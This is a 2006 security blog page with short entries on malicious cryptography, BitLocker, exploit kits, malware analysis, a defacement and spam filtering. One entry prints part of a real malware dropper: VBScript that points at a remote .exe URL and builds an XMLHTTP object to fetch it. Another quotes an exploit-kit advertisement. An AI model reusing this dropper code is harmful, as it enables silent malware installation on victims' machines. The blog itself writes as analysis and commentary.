Of Spam & Men


Friday 24 November 2006

Malicious crypto: (Ab)use cryptology

This is a very interesting lecture from Frederic Raynal of the French security magazine MISC:

Cryptology is everywhere nowadays. Most of the time, people don't even know they are actually using it on a daily basis. In this lecture, we'll show how cryptography is actually a double-edged sword. Despite cryptology's common use as a defensive way by providing primitives like confidentiality and integrity, we'll see how to use cryptology for malicious purposes. We use it here to improve target selection during attacks, to save time or to be as stealthy as possible.

Continue reading...

Thursday 23 November 2006

Vista's BitLocker: More security for laptops

Vista's Enterprise and Ultimate editions will introduce a new (for Windows) security feature called BitLocker:

BitLocker Drive Encryption is a data protection feature available in Windows Vista Enterprise and Ultimate for client computers and in Windows Server "Longhorn". BitLocker is Microsoft’s response to one of our top customer requests: address the very real threats of data theft or exposure from lost, stolen or inappropriately decommissioned PC hardware with a tightly integrated solution in the Windows Operating System.

You can configure Vista to require a USB pen key or a flash drive to boot. If the user can't provide the right key, the data on the hard drive stays encrypted and (relatively) secure.

Continue reading...

Malware 2.0: Malware utilizes AJAX to install itself

Well, OK, it's not really AJAX. This malware uses an HTML snippet with XMLHttpRequest to fetch and download the actual executable. Add some minor obfuscation to fool antivirus scanners and you get W32/new-malware!Maximus on your hard drive:

[title][/title]
[head][/head]
[body]
[script language="VBScript"]
on error resume next

' due to how ajax works, the file MUST be within the same local domain
dl = "http://grupo-arroba.by.ru/grupo.exe"

' create adodbstream object
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")

Continue reading...

Sunday 19 November 2006

Web-Attacker Exposed

Websense analyzes Web-Attacker. Web-Attacker is the most popular toolkit for building malicious sites; it is supposedly used by one third of the malicious sites discovered:

Dear Friends! We would like to offer you multi-component exploit Web-Attacker, that realizes vulnerabilities in the internet browsers Internet Explorer and Mozilla Firefox. With the help of this exploit you will be able to install any programs on the local disks of visitors of your web pages. In the foundation of work of the exploit Web-Attacker, there are 7 already-known vulnerabilities in the internet browsers.

Objective of the Exploit: Hidden drop of the executable from the deleted source to the local hard drive of the site visitor.

It costs $300 and provides a few files to help you build your own malicious site. Just provide malware, a keylogger, or whatever you want to infect your visitors with.

Continue reading...

Saturday 18 November 2006

Malware Case Study

Secure Science Corporation and Michael Ligh did a very good job analyzing a piece of malware. Their case study is a very complete and interesting analysis of a yet-to-be-named malware (prg.exe):

This document contains details of an exploratory case study that was conducted on a malware specimen found in the wild by members of the Mal-Aware Group. The trojan was hosted on web servers located in the Ukraine and Russia, and existed among several gigabytes of data encoded with a proprietary algorithm. There were nearly 10,000 individual files available, each containing between 70 bytes and 56 megabytes worth of stolen data that only criminals could read…until now.

Continue reading...

Polish Police Own3d

Looks like one of the Polish police's sites (http://www.elblag.policja.gov.pl) was defaced this week by a team named "un-root". Zone-h has a mirror of the defacement here.

Continue reading...

Thursday 16 November 2006

When spammers get serious

Spammers spam and I make a living stopping spam (well, that's not the only thing I do) and I do it well. At work we use a combination of SpamAssassin and CRM114. That's a combination of two different antispam mechanisms:

This system isn't perfect but gives pretty good results: 99.6% of the spam that was sent to my addresses was detected. But that was before they started using poisoning methods and captcha images...

Continue reading...

Holy Smoking Laptop!

PC Pitshop did an interesting experiment involving a laptop and an explosion-prone battery:

Continue reading...
